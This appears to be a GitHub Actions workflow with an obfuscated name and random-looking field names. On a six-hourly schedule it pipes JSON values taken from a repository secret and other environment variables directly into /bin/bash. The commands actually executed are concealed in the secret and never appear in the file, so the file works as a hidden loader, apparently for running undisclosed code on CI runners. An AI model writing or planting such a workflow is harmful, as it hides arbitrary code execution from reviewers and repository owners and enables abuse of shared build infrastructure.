name: dingweidwa

on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dingweidwa
        env:
          y3: ${{ secrets.y3 }}
        run: |
          echo $y3 | jq -r .fnkqv658 | /bin/bash
          echo $q7 | jq -r .snp155 | /bin/bash
          echo $lem79304 | jq -r .jjco38262 | /bin/bash
          echo $h03756 | jq -r .zld30593 | /bin/bash
          echo $uyop116 | jq -r .uzbc043 | /bin/bash
          echo $om1 | jq -r .xktz429 | /bin/bash

